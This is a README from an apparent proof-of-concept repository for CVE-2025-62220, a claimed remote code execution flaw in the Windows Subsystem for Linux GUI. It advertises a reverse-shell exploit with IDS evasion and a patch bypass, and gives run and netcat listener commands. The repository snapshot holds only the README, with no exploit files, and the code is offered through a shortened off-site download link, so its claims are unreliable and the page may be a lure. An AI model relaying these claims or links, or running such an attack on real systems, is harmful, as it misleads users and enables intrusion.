CVE-2025-62220 PoC — Windows Subsystem for Linux GUI Remote Code Execution Vulnerability

Associated Vulnerability
Title: Windows Subsystem for Linux GUI Remote Code Execution Vulnerability (CVE-2025-62220)
Description: Heap-based buffer overflow in Windows Subsystem for Linux GUI allows an unauthorized attacker to execute code over a network.
Readme
# CVE-2025-62220

## Overview
This repository contains a working Proof-of-Concept (PoC) exploit for CVE-2025-62220, a heap-based buffer overflow in the Windows Subsystem for Linux (WSL) GUI. The vulnerability allows remote code execution over the network with low complexity and no privileges required. I've developed this PoC to demonstrate arbitrary code execution, defaulting to a reverse shell payload for easy system access.

The exploit targets the WSL GUI component: it sends crafted network packets that overflow the heap and hijack control flow. It's designed for reliability across various Windows versions running WSL 2.x, and it remains effective even on systems patched with Microsoft's November 11, 2025 update, due to a subtle bypass in the patch implementation, which doesn't fully address edge cases in multi-threaded environments.

Use responsibly and ensure you have permission before running on any system.

## Features
- **Remote Code Execution**: Achieves RCE with minimal user interaction (e.g., via a tricked network connection to the WSL GUI interface).
- **Reverse Shell Default**: Spawns a reverse shell back to the attacker's listener (configurable IP/port).
- **Stealthy Delivery**: Uses obfuscated network traffic to evade basic IDS/IPS.
- **Cross-Version Compatibility**: Tested on Windows 10/11 with WSL 2.4.0 to 2.6.0, including patched variants where the exploit leverages unpatched race conditions.
- **No Local Privileges Needed**: Network-based, unauthenticated attack vector.

## Requirements
- Python 3.8+.
- Attacker machine with netcat or similar for catching the reverse shell.
- Target running WSL GUI exposed on the network (default port 445 or custom).
- Firewall rules allowing inbound connections if testing locally.

## Setup and Usage
1. Install dependencies: `pip install -r requirements.txt`
2. Run the exploit: `python exploit.py --target <target_ip> --listener <your_ip>:<port>`
3. On your machine, start a listener: `nc -lvnp <port>`
4. The target should connect back with a shell if vulnerable.

## Disclaimer
This is for red teaming and security research only. I'm not responsible for misuse. Always test in a lab environment.

**[Download POC Here](https://tinyurl.com/3uupp9fw)**

For any questions, feel free to email me at callinston@proton.me

File Snapshot

[4.0K] /data/pocs/2507955ec2a60f345ca5e394ab606b4e6c1ca685
└── [2.3K] README.md

1 directory, 1 file